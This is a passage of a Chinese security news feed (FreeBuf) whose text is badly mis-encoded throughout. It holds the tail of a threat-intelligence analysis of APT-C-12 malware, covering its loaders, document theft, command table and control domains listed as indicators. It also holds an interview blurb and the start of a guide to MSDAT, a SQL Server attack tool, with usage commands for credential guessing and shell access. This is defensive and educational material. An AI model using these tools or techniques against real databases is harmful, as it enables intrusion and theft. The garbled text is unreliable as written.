892<p> å¦‚ä¸‹å›¾æ‰€ç¤ºè¯¥è¯±é¥µæ–‡ä»¶ä¼ªè£…æˆæ–‡ä»¶å¤¹çš„å›¾æ ‡ï¼Œæ‰§è¡ŒåŽä¼šæ‰“å¼€åŒ…å«æœ‰è¯±é¥µæ–‡æ¡£å’Œå›¾ç‰‡çš„æ–‡ä»¶å¤¹ï¼Œè€Œæ¤æ—¶å®žé™…çš„æ¶æ„è½½è·å·²ç»åœ¨åŽå°æ‰§è¡Œã€‚</p>
893<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323161665250.png" width="554" height="311"></p>
894<p> 当该诱饵文件è¿è¡Œæ—¶ï¼Œå…¶ä¼šè§£å¯†é‡Šæ”¾4个文件,其ä¸ä¸¤ä¸ªä¸ºä¸Šè¿°çš„诱导文档和图片,å¦å¤–ä¸ºä¸¤ä¸ªæ¶æ„çš„tmp文件。</p>
895<p><img alt="image.png" src="http://image.3001.net/images/20180723/153231618033.png!small" width="690" height="513"></p>
896<p> é‡Šæ”¾çš„æ¶æ„tmp文件路径为:</p>
897<p> %temp%\unicode32.tmp</p>
898<p> %appdata%\WinRAR\update.tmp</p>
899<p> 最åŽé€šè¿‡LoadLibraryWåŠ è½½é‡Šæ”¾çš„unicode32.tmp文件。</p>
900<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323161896505.png!small" width="690" height="28"></p>
901<h3>unicode32.tmp</h3>
902<p> unicode32.tmp为一个loader,其主è¦ç”¨äºŽåŠ è½½update.tmp,如下图所示其通过rundll32.exeåŠ è½½update.tmp,并调用其导出函数jj。</p>
903<p><img alt="image.png" src="http://image.3001.net/images/20180723/1532316199409.png!small" width="690" height="660"></p>
904<p> å½“åŠ è½½äº†update.tmpåŽï¼Œä¼šåˆ 除装载exeç¨‹åºæ–‡ä»¶å’Œè‡ªèº«ã€‚</p>
905<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162073863.png!small" width="690" height="304"></p>
906<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162145656.png!small" width="690" height="161"></p>
907<h3>update.tmp</h3>
908<p> 该文件为一个DLL,并有一个å为jj的导出函数。</p>
909<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162243979.png!small" width="690" height="124"></p>
910<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162311824.png!small" width="690" height="209"></p>
911<p> å…¶é¦–å…ˆä¼šå¯¹ç›®æ ‡ä¸»æœºè¿›è¡Œä¿¡æ¯æ”¶é›†ã€‚</p>
912<p>获å–系统版本信æ¯ï¼š</p>
913<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162392198.png!small" width="690" height="541"></p>
914<p>调用CreateToolhelp32Snapshot获å–系统进程信æ¯ï¼š</p>
915<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162486559.png!small" width="690" height="287"></p>
916<p>调用GetAdaptersInfo获å–网å¡MAC地å€ï¼š</p>
917<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162581447.png!small" width="690" height="201"></p>
918<p>判æ–当å‰ç³»ç»ŸçŽ¯å¢ƒæ˜¯32使ˆ–64ä½ï¼š</p>
919<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162652619.png!small" width="690" height="240"></p>
920<p>通过注册表获å–已安装的程åºä¿¡æ¯ï¼ŒèŽ·å–的安装程åºä¿¡æ¯åŠ ä¸Šå‰ç¼€â€ISLâ€æ ¼å¼åŒ–:</p>
921<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162735456.png!small" width="690" height="242"></p>
922<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162893124.png!small" width="690" height="420"></p>
923<p>通过注册表获å–DisplayNameå’ŒDisplayVersion的信æ¯ï¼Œå¹¶å°†DisplayName å’ŒDisplayVersionæ ¼å¼åŒ–为â€%sâ€:{“NDâ€:â€%sâ€,â€DVâ€:â€%sâ€}。</p>
924<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163036749.png!small" width="690" height="119"></p>
925<p><img alt="image.png" src="http://image.3001.net/images/20180723/1532316307665.png!small" width="690" height="128">ä¿¡æ¯æ”¶é›†åŽä¼šé¦–å…ˆå‘远程控制æœåС噍å‘é€ä¸Šçº¿ä¿¡æ¯ã€‚</p>
926<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163187412.png!small" width="690" height="316"></p>
927<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163262352.png!small" width="690" height="223"></p>
928<p> 获å–tmp目录, 创建AdobeNW目录,并从控制æœåŠ¡å™¨ä¸Šä¸‹è½½AdobeUpdate.tmp作为第二阶段的载è·ï¼Œå…¶å®žé™…为一个DLL文件。</p>
929<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163348026.png!small" width="690" height="269"></p>
930<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163423134.png!small" width="690" height="304"></p>
931<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163497013.png!small" width="690" height="173"></p>
932<p> 最终调用rundll32å¯åЍDLL文件的导出函数MainFun,如果进程创建æˆåŠŸç»™æœåŠ¡å™¨è¿”å›žä¿¡æ¯ã€‚</p>
933<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163571605.png!small" width="690" height="130"></p>
934<h3>AdobeUpdate.tmp</h3>
935<p> AdobeUpdate.tmp为DLL文件,其导出方法MainFun由第一阶段木马DLL调用执行。</p>
936<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163669843.png!small" width="690" height="236"></p>
937<p> 其首先é历%USERPROFILE%\AppData路径下tmpåŽç¼€æ–‡ä»¶ï¼Œå¹¶åˆ 除。</p>
938<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163766026.png!small" width="690" height="633"></p>
939<p> ç„¶åŽä»Žæ–‡ä»¶è‡ªèº«å°¾éƒ¨è¯»å–é…置信æ¯å¹¶è§£å¯†ï¼Œå…¶æ ¼å¼å¦‚下:</p>
940<p> åŠ å¯†çš„é…置信æ¯ï¼ŒåŒ…æ‹¬æ ‡è¯†ID,控制æœåŠ¡å™¨åœ°å€ï¼ŒåР坆IVå’ŒKEY,以åŠMutexä¿¡æ¯ï¼›</p>
941<p> 4å—èŠ‚åŠ å¯†é…置信æ¯é•¿åº¦ï¼›</p>
942<p> 17å—节解密密钥;</p>
943<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163887262.png!small" width="690" height="215"></p>
944<p> 例如上图所示的解密é…置文件的KEY为sobcsnkciatwiffi,其解密算法如下:</p>
945<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163962540.png!small" width="690" height="274"></p>
946<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164061692.png!small" width="690" height="393"></p>
947<p> 解密之åŽçš„é…置文件如下所示:</p>
948<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164153662.png!small" width="690" height="196"></p>
949<p> 查询HKEY_CURRENT_USER下的MyAppæ³¨å†Œè¡¨æŸ¥çœ‹æ˜¯å¦æœ‰FirstExec, 通过å—符串â€noâ€æ¥åˆ¤æ–该DLLæ˜¯å¦æ˜¯ç¬¬ä¸€æ¬¡æ‰§è¡Œã€‚</p>
950<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164212876.png!small" width="690" height="170"></p>
951<p> è‹¥DLLä¸ä¸ºé¦–æ¬¡æ‰§è¡Œï¼Œåˆ™è½®è¯¢èŽ·å–æŽ§åˆ¶æœåŠ¡å™¨å‘½ä»¤ï¼Œå¦åˆ™é历ç£ç›˜C:到F:ä¸çš„æ–‡æ¡£æ–‡ä»¶ä¿¡æ¯ï¼Œå¹¶ä¿å˜åœ¨temp文件夹下的list_tmp.txtä¸ã€‚</p>
952<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164281402.png!small" width="690" height="437"></p>
953<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164399584.png!small" width="690" height="385"></p>
954<p> 其䏿Ÿ¥æ‰¾çš„æ–‡æ¡£ç±»åž‹åŒ…括.ppt .pptx .pdf.xls .xlsx .doc .docx .txt .wps .rtf的文档,将文档文件路径ã€åˆ›å»ºæ—¶é—´ä»¥åŠæ–‡ä»¶å¤§å°ä¿¡æ¯è¿›è¡Œä¿å˜ã€‚</p>
955<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164496291.png!small" width="690" height="337"></p>
956<p> ä¸‹å›¾ä¸ºç¤ºä¾‹çš„å†™å…¥æ•°æ®æ ¼å¼(文件路径 创建时间文件大å°):</p>
957<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164578699.png!small" width="690" height="121"></p>
958<p> å¹¶å°†list_tmp.txt进行aesåŠ å¯†åŽä¸Šä¼ 到控制æœåŠ¡å™¨ï¼š</p>
959<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164643621.png!small" width="690" height="270"></p>
960<p> 接ç€è®¾ç½®æ³¨å†Œè¡¨FirstExecæ ‡å¿—ï¼š</p>
961<p><img alt="image.png" src="http://image.3001.net/images/20180723/1532316477703.png!small" width="690" height="124"></p>
962<p> AdobeUpdate.dll木马实现了丰富的命令控制指令,其通过访问控制域å获å–åŒ…å«æœ‰æŽ§åˆ¶å‘½ä»¤çš„æ–‡ä»¶ï¼Œå¹¶åœ¨æœ¬åœ°è§£å¯†è§£æžåŽæ‰§è¡Œã€‚</p>
963<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164865195.png!small" width="690" height="687"></p>
964<p> 其指令以***和对应指令数å—组æˆï¼Œä»¥ä¸‹ä¸ºæŽ§åˆ¶æŒ‡ä»¤åŠŸèƒ½åˆ—è¡¨ï¼š</p>
965<div class="simditor-table">
966<div class="simditor-resize-handle"></div>
967</div>
968<table>
969<colgroup>
970<col>
971<col> </colgroup>
972<thead>
973<tr>
974<th> <b>***1</b> </th>
975<th> 执行cmd命令 </th>
976</tr>
977</thead>
978<tbody>
979<tr>
980<td> <b>***2</b> </td>
981<td> æ›´æ–°AppNameé…ç½® </td>
982</tr>
983<tr>
984<td> <b>***3</b> </td>
985<td> æ–‡ä»¶ä¸Šä¼ </td>
986</tr>
987<tr>
988<td> <b>***4</b> </td>
989<td> 文件下载 </td>
990</tr>
991<tr>
992<td> <b>***5</b> </td>
993<td> 更新控制域å </td>
994</tr>
995<tr>
996<td> <b>***7</b> </td>
997<td> ä¸Šä¼ æ–‡æ¡£æ–‡ä»¶åˆ—è¡¨ä¿¡æ¯ </td>
998</tr>
999<tr>
1000<td> <b>***8</b> </td>
1001<td> 执行dll文件或exe </td>
1002</tr>
1003<tr>
1004<td> <b>***9</b> </td>
1005<td> æ–‡ä»¶åˆ é™¤ </td>
1006</tr>
1007<tr>
1008<td> <b>***10</b> </td>
1009<td> 指定文件列表信æ¯ä¸Šä¼ </td>
1010</tr>
1011<tr>
1012<td> <b>***11</b> </td>
1013<td> ä¿ç•™ </td>
1014</tr>
1015</tbody>
1016</table>
1017<h2>控制基础设施</h2>
1018<p> APT-C-12组织近期活动ä¸ä½¿ç”¨çš„æ¶æ„代ç 利用了applinzi.com域å下的二级域å作为控制域å,该域å为Sina App Engine的云æœåŠ¡æ‰˜ç®¡ã€‚</p>
1019<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165087113.png!small" width="318" height="176"></p>
1020<p> 我们测试注册了SAE的账户,其默认创建应用å¯ä»¥å…费使用å多天,并支æŒå¤šç§å¼€å‘è¯è¨€çš„环境部署。</p>
1021<p><img alt="image.png" src="http://image.3001.net/images/20180723/153231652382.png!small" width="526" height="251"></p>
1022<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165331299.png!small" width="397" height="209"><img alt="image.png" src="http://image.3001.net/images/20180723/153231654024.png!small" width="629" height="315"></p>
1023<p> 我们å°è¯•对其控制æœåŠ¡å™¨è¿›è¡Œè¿žæŽ¥ï¼Œä½†å…¶åŽå°å¤„ç†ç¨‹åºå·²ç»å‡ºé”™ï¼Œé€šè¿‡è¿”å›žçš„é”™è¯¯ä¿¡æ¯æˆ‘们å¯ä»¥å‘现该组织使用Python部署的åŽå°åº”用,并使用了flask作为其WebæœåŠ¡å®žçŽ°ã€‚</p>
1024<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165489628.png!small" width="900" height="396"></p>
1025<h3>SAE控制åè®®</h3>
1026<p> 该组织针对SAE的部署应用实现了一套访问å议,其分为put,info,get,del四个功能。</p>
1027<p> å…¶ä¸putç”¨äºŽä¸Šä¼ æ–‡ä»¶ï¼š</p>
1028<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165939137.png!small" width="690" height="285"></p>
1029<p> getç”¨äºŽèŽ·å–æ–‡ä»¶ï¼š</p>
1030<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323166002751.png!small" width="690" height="148"></p>
1031<p> info用于获å–ä¿¡æ¯ï¼š</p>
1032<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323166063453.png!small" width="690" height="417"></p>
1033<p> delç”¨äºŽåˆ é™¤æ–‡ä»¶ï¼š</p>
1034<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323166145883.png!small" width="634" height="522"></p>
1035<h2>总结</h2>
1036<p> ç»§360å¨èƒæƒ…报ä¸å¿ƒå‘现该组织利用Digital Ocean云æœåŠ¡ä½œä¸ºå‘½ä»¤æŽ§åˆ¶å’Œå›žä¼ é€šä¿¡æ¸ é“以åŽï¼Œæˆ‘们åˆå‘现该组织使用国内的云æœåŠ¡SAEæž„å»ºå…¶æŽ§åˆ¶å›žä¼ åŸºç¡€è®¾æ–½ï¼Œåˆ©ç”¨è¿™ç§æ–¹å¼ä¸€å®šç¨‹åº¦ä¸Šå‡å°‘äº†æ”»å‡»åˆ©ç”¨çš„æˆæœ¬ï¼Œä¹Ÿå¢žåŠ äº†åˆ†æžå›žæº¯çš„难度。</p>
1037<h2>IOC</h2>
1038<p>crecg.applinzi.com</p>
1039<p>costbank.applinzi.com</p>
1040<h2>å‚考链接</h2>
1041<p><a href="https://sae.sina.com.cn/" ref="">https://sae.sina.com.cn/</a></p>
1042<h2>原文链接:</h2>
1043<p><a href="https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/">https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/</a> </p>
1044<p><b style="color: rgb(159, 163, 168);">*本文作者:360天眼实验室,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1045]]></content:encoded>
1046 <wfw:commentRss>http://www.freebuf.com/articles/system/178422.html/feed</wfw:commentRss>
1047 <slash:comments>3</slash:comments>
1048 </item>
1049 <item>
1050 <title>ã€FreeBufå—幕组】HackerOne优秀白帽黑客采访系列-Alyssa Herrera</title>
1051 <link>http://www.freebuf.com/video/178627.html</link>
1052 <comments>http://www.freebuf.com/video/178627.html#comments</comments>
1053 <pubDate>Wed, 25 Jul 2018 07:05:04 +0000</pubDate>
1054 <dc:creator>willhuang</dc:creator>
1055 <category><![CDATA[视频]]></category>
1056 <category><![CDATA[Alyssa Herrera]]></category>
1057 <category><![CDATA[FreeBufå—幕组]]></category>
1058 <category><![CDATA[HackerOne]]></category>
1059 <category><![CDATA[白帽采访]]></category>
1060
1061 <guid isPermaLink="false">http://www.freebuf.com/?p=178627</guid>
1062 <description><![CDATA[äººç‰©ä»‹ç» Alyssa Herrera,自从16å²æŽ¥è§¦åˆ°æ¼æ´žä¼—测之åŽï¼Œå°±çˆ±ä¸Šäº†è¿™ä¸ªè¡Œä¸šã€‚作为众测社区为数ä¸å¤šçš„女性白帽,Alyssa Herreraçš„æ¼æ´žå‘现æˆå°±æžå…·ä»£è¡¨æ€§ï¼Œåœ¨ç¾Žå›½å›½é˜²éƒ¨â€œHack The Pentagonâ€æ¼æ´žä¼—测项目ä¸ï¼Œå¥¹ä»¥å¤šä¸ªé«˜å±æ¼æ´žå’Œ50å¤šä¸ªæ¼æ´žå‘现é‡çš„优异æˆç»©ï¼Œè·»èº«æŽ’行榜第八,她分享的《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》广å—好评。å¦å¤–,Alyssaè¿˜æ˜¯å¼€æºæ¼æ´žä¼—测社区OpenBugBounty多达1500å¤šä¸ªæ¼æ´žä¸ŠæŠ¥è€…,以åŠAT&T公叿¼æ´žåäººå ‚èŽ·å¾—è€…ã€‚ ç›®å‰ï¼ŒAlyssa为Synackå…¬å¸çš„Red Team工作,主è¦å·¥ä½œä¸ºå®¢æˆ·åނ商æä¾›é£Žé™©è¯„ä¼°ã€æ¸—逿µ‹è¯•å’Œæ¼æ´žåŠ å›ºã€‚åœ¨H1-415黑客大赛ä¸ï¼Œæˆ‘们一起æ¥å¬å¬Alyssa Herreraçš„ç»éªŒåˆ†äº«ã€‚ 观看视频 看ä¸åˆ°è§†é¢‘点这里 演讲PPT: 《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》 *本课程翻译自Youtube精选系列教程,喜欢的点一波关注(æ¯å‘¨æ›´æ–°ï¼‰ï¼ * 本文作者:willhuang,FreeBuf视频组è£èª‰å‡ºå“,转载须注明æ¥è‡ªFreeBuf.COM]]></description>
1063 <content:encoded><![CDATA[<h2>人物介ç»</h2>
1064<p><b style="color: rgb(0, 176, 80);">Alyssa Herrera,自从16å²æŽ¥è§¦åˆ°æ¼æ´žä¼—测之åŽï¼Œå°±çˆ±ä¸Šäº†è¿™ä¸ªè¡Œä¸šã€‚作为众测社区为数ä¸å¤šçš„女性白帽,Alyssa Herreraçš„æ¼æ´žå‘现æˆå°±æžå…·ä»£è¡¨æ€§ï¼Œåœ¨ç¾Žå›½å›½é˜²éƒ¨â€œHack The Pentagonâ€æ¼æ´žä¼—测项目ä¸ï¼Œå¥¹ä»¥å¤šä¸ªé«˜å±æ¼æ´žå’Œ50å¤šä¸ªæ¼æ´žå‘现é‡çš„优异æˆç»©ï¼Œè·»èº«æŽ’行榜第八,她分享的《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》广å—好评。å¦å¤–,Alyssaè¿˜æ˜¯å¼€æºæ¼æ´žä¼—测社区OpenBugBounty多达1500å¤šä¸ªæ¼æ´žä¸ŠæŠ¥è€…,以åŠAT&T公叿¼æ´žåäººå ‚èŽ·å¾—è€…ã€‚</b></p>
1065<p><b style="color: rgb(0, 176, 80);">ç›®å‰ï¼ŒAlyssa为Synackå…¬å¸çš„Red Team工作,主è¦å·¥ä½œä¸ºå®¢æˆ·åނ商æä¾›é£Žé™©è¯„ä¼°ã€æ¸—逿µ‹è¯•å’Œæ¼æ´žåŠ å›ºã€‚åœ¨H1-415黑客大赛ä¸ï¼Œæˆ‘们一起æ¥å¬å¬Alyssa Herreraçš„ç»éªŒåˆ†äº«ã€‚</b></p>
1066<p><b style="color: rgb(0, 176, 80);"></b></p>
1067</p>
1068<h2><b style="color: rgb(51, 51, 51);">观看视频</b></h2>
1069<p style="text-align: center;"><b style="color: rgb(0, 176, 80);"> <iframe frameborder="0" width="640" height="498" src="https://v.qq.com/iframe/player.html?vid=l073376dtab&tiny=0&auto=0"></iframe></b></p>
1070<p style="text-align: center;"><b style="color: rgb(0, 176, 80);"><b style="color: rgb(0, 176, 80);">看ä¸åˆ°è§†é¢‘<a href="https://v.qq.com/x/page/l073376dtab.html" target="_blank">点这里</a></b></b></p>
1071<h2><b>演讲PPT:</b></h2>
1072<blockquote><p><a href="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a">《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》</a></p>
1073</blockquote>
1074<h3><span style="color: rgb(0, 176, 80);"><b>*本课程翻译自Youtube精选系列教程,喜欢的点一波关注(æ¯å‘¨æ›´æ–°ï¼‰ï¼</b><br /></span></h3>
1075<p><b style="color: rgb(0, 176, 80);"></b></p>
1076<p><b style="color: rgb(0, 176, 80);"><b style="color: rgb(0, 176, 80);"><b style="color: rgb(159, 163, 168);">* 本文作者:willhuang,FreeBuf视频组è£èª‰å‡ºå“,转载须注明æ¥è‡ªFreeBuf.COM</b></b> </b></p>
1077]]></content:encoded>
1078 <wfw:commentRss>http://www.freebuf.com/video/178627.html/feed</wfw:commentRss>
1079 <slash:comments>4</slash:comments>
1080 </item>
1081 <item>
1082 <title>MSDAT:一款专门针对Microsoft SQLæ•°æ®åº“çš„æ¸—é€æµ‹è¯•工具</title>
1083 <link>http://www.freebuf.com/sectool/177187.html</link>
1084 <comments>http://www.freebuf.com/sectool/177187.html#comments</comments>
1085 <pubDate>Wed, 25 Jul 2018 07:00:59 +0000</pubDate>
1086 <dc:creator>Alpha_h4ck</dc:creator>
1087 <category><![CDATA[工具]]></category>
1088 <category><![CDATA[MSDAT]]></category>
1089 <category><![CDATA[SQLæ•°æ®åº“]]></category>
1090 <category><![CDATA[æ¸—é€æµ‹è¯•]]></category>
1091
1092 <guid isPermaLink="false">http://www.freebuf.com/?p=177187</guid>
1093 <description><![CDATA[今天给大家介ç»çš„æ˜¯ä¸€æ¬¾åå«MSDAT(Microsoft SQL Database Attacking Tool)的工具,MSDAT是一款开æºçš„æ¸—逿µ‹è¯•å·¥å…·ï¼Œç ”ç©¶äººå‘˜å¯åˆ©ç”¨MSDATæ¥å¯¹Microsoft SQLæ•°æ®åº“的安全性进行远程测试。 MSDAT使用场景: 有一个需è¦è¿œç¨‹ç›‘å¬çš„Microsoftæ•°æ®åº“ï¼Œä½ æƒ³è¦æ‰¾åˆ°å¯ä»¥ç”¨æ¥è·Ÿè¿™ä¸ªæ•°æ®åº“连接的有效å‡è¯ ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ æƒ³è¦æå‡è¯¥è´¦å·çš„æƒé™ ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ 想è¦åœ¨æ‰˜ç®¡è¯¥æ•°æ®åº“的主机上执行命令(xp_cmdshell) 注:该工具已在Microsoft SQL Database 2005ã€2008å’Œ2012版本上æˆåŠŸæµ‹è¯•ã€‚ åŠŸèƒ½ä»‹ç» åœ¨MSDATçš„å¸®åŠ©ä¸‹ï¼Œä½ å¯ä»¥å®žçŽ°ä»¥ä¸‹ç›®æ ‡ï¼š -åœ¨æ— éœ€é€šè¿‡èº«ä»½éªŒè¯çš„æƒ…况下获å–ç›®æ ‡MSSQLæ•°æ®åº“的技术信æ¯ï¼ˆä¾‹å¦‚æ•°æ®åº“版本); -通过å—典攻击æœç´¢MSSQLè´¦å·ï¼› -测试登录å‡è¯ï¼› -拿到数æ®åº“æœåŠ¡å™¨çš„Windows shell(xp_cmdshell); -远程下载/ä¸Šä¼ æ–‡ä»¶ï¼› -获å–SMBå‡è¯ï¼› -窃å–MSSQL哈希密ç ï¼› -æ‰«ææ•°æ®åº“端å£ï¼› -远程执行SQL请求; -获å–主机文件/目录; -创建文件夹; 工具安装 在è¿è¡ŒMSDAT之å‰ï¼Œä½ 需è¦å®‰è£…æŸäº›ä¾èµ–组件。 Ubuntu: sudo apt-get install freetds-dev 或直接从http://www.freetds.org/下载: sudo pip install cython colorlog termcolor pymssql argparse sudo pip install argcomplete && sudo activate-global-python-argcomplete 在freetdsé…置文件(/etc/freetds/freetds.conf或/usr/local/etc/freetds.conf)䏿·»åŠ ”usentlmv2 = yes”,例如: [global]         # TDS protocol version         tds version = 8.0         use ntlmv2 = yes ä½¿ç”¨æ ·ä¾‹ èŽ·å–æ‰€æœ‰æ¨¡å—: ./msdat.py -h åˆ—ä¸¾æ¨¡å—æ‰€æœ‰åŠŸèƒ½å’Œé€‰é¡¹ï¼ˆä¾‹å¦‚ï¼šall): ./msdat.py all -h æ³¨ï¼šä½ å¯ä»¥ä½¿ç”¨â€œ–test-moduleâ€œé€‰é¡¹æ¥æŸ¥çœ‹ç‰¹å®šæ¨¡å—是å¦é€‚ç”¨äºŽç›®æ ‡MSSQLæ•°æ®åº“。 allæ¨¡å— all模å—å¯ä»¥ç›´æŽ¥è¿è¡ŒMSDAT的所有模å—: python msdat.py all -s $SERVER 下é¢å‘½ä»¤å¯ä»¥å®žçŽ°ï¼š -利用å—典攻击测试å¸å·å‡è¯ï¼› -æµ‹è¯•ç›®æ ‡è´¦å·çš„密ç ï¼› -定义timeout值; ./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10--force-retry […]]]></description>
1094 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">今天给大家介ç»çš„æ˜¯ä¸€æ¬¾åå«MSDAT(Microsoft SQL Database Attacking Tool)的工具,MSDAT是一款开æºçš„æ¸—逿µ‹è¯•å·¥å…·ï¼Œç ”ç©¶äººå‘˜å¯åˆ©ç”¨MSDATæ¥å¯¹Microsoft SQLæ•°æ®åº“的安全性进行远程测试。</b></p>
1095<p><img alt="1.png" src="http://image.3001.net/images/20180711/15312425795923.png!small" width="690" height="323"></p>
1096<h3>MSDAT使用场景:</h3>
1097<blockquote><p>有一个需è¦è¿œç¨‹ç›‘å¬çš„Microsoftæ•°æ®åº“ï¼Œä½ æƒ³è¦æ‰¾åˆ°å¯ä»¥ç”¨æ¥è·Ÿè¿™ä¸ªæ•°æ®åº“连接的有效å‡è¯</p>
1098<p>ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ æƒ³è¦æå‡è¯¥è´¦å·çš„æƒé™</p>
1099<p>ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ 想è¦åœ¨æ‰˜ç®¡è¯¥æ•°æ®åº“的主机上执行命令(xp_cmdshell)</p>
1100</blockquote>
1101<p>注:该工具已在Microsoft SQL Database 2005ã€2008å’Œ2012版本上æˆåŠŸæµ‹è¯•ã€‚</p>
1102<h2>功能介ç»</h2>
1103<p>在MSDATçš„å¸®åŠ©ä¸‹ï¼Œä½ å¯ä»¥å®žçŽ°ä»¥ä¸‹ç›®æ ‡ï¼š</p>
1104<p>-åœ¨æ— éœ€é€šè¿‡èº«ä»½éªŒè¯çš„æƒ…况下获å–ç›®æ ‡MSSQLæ•°æ®åº“的技术信æ¯ï¼ˆä¾‹å¦‚æ•°æ®åº“版本);</p>
1105<p>-通过å—典攻击æœç´¢MSSQLè´¦å·ï¼›</p>
1106<p>-测试登录å‡è¯ï¼›</p>
1107<p>-拿到数æ®åº“æœåŠ¡å™¨çš„Windows shell(xp_cmdshell);</p>
1108<p>-远程下载/ä¸Šä¼ æ–‡ä»¶ï¼›</p>
1109<p>-获å–SMBå‡è¯ï¼›</p>
1110<p>-窃å–MSSQL哈希密ç ï¼›</p>
1111<p>-æ‰«ææ•°æ®åº“端å£ï¼›</p>
1112<p>-远程执行SQL请求;</p>
1113<p>-获å–主机文件/目录;</p>
1114<p>-创建文件夹;</p>
1115<h2>工具安装</h2>
1116<p>在è¿è¡ŒMSDAT之å‰ï¼Œä½ 需è¦å®‰è£…æŸäº›ä¾èµ–组件。</p>
1117<p>Ubuntu:</p>
1118<pre><code>sudo apt-get install freetds-dev</code></pre>
1119<p>或直接从<a href="http://www.freetds.org/">http://www.freetds.org/</a>下载:</p>
1120</p>
1121<pre><code>sudo pip install cython colorlog termcolor pymssql argparse
1122sudo pip install argcomplete && sudo activate-global-python-argcomplete</code></pre>
1123<p>在freetdsé…置文件(/etc/freetds/freetds.conf或/usr/local/etc/freetds.conf)䏿·»åŠ ”usentlmv2 = yes”,例如: </p>
1124</p>
1125<pre><code>[global]
1126 # TDS protocol version
1127 tds version = 8.0
1128 use ntlmv2 = yes</code></pre>
1129</p>
1130<h2>ä½¿ç”¨æ ·ä¾‹</h2>
1131<p>èŽ·å–æ‰€æœ‰æ¨¡å—:</p>
1132<pre><code>./msdat.py -h</code></pre>
1133<p>åˆ—ä¸¾æ¨¡å—æ‰€æœ‰åŠŸèƒ½å’Œé€‰é¡¹ï¼ˆä¾‹å¦‚ï¼šall):</p>
1134<pre><code>./msdat.py all -h</code></pre>
1135<p>æ³¨ï¼šä½ å¯ä»¥ä½¿ç”¨â€œ–test-moduleâ€œé€‰é¡¹æ¥æŸ¥çœ‹ç‰¹å®šæ¨¡å—是å¦é€‚ç”¨äºŽç›®æ ‡MSSQLæ•°æ®åº“。</p>
1136<h3>all模å—</h3>
1137<p>all模å—å¯ä»¥ç›´æŽ¥è¿è¡ŒMSDAT的所有模å—:</p>
1138<pre><code>python msdat.py all -s $SERVER</code></pre>
1139<p>下é¢å‘½ä»¤å¯ä»¥å®žçŽ°ï¼š</p>
1140<p>-利用å—典攻击测试å¸å·å‡è¯ï¼›</p>
1141<p>-æµ‹è¯•ç›®æ ‡è´¦å·çš„密ç ï¼›</p>
1142<p>-定义timeout值;</p>
1143<pre><code>./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10--force-retry</code></pre>
1144<p>注:在æ¯ä¸€ä¸ªæ¨¡å—ä¸ï¼Œä½ å¯ä»¥åˆ©ç”¨â€œ–charset“选项æ¥ä¹‰æ‰€è¦ä½¿ç”¨çš„å—符集。</p>
1145<h3>mssqlinfo模å—</h3>
1146<p>åœ¨æ— éœ€é€šè¿‡èº«ä»½éªŒè¯çš„æƒ…况下获å–ç›®æ ‡MSSQLæ•°æ®åº“的技术信æ¯ï¼š</p>
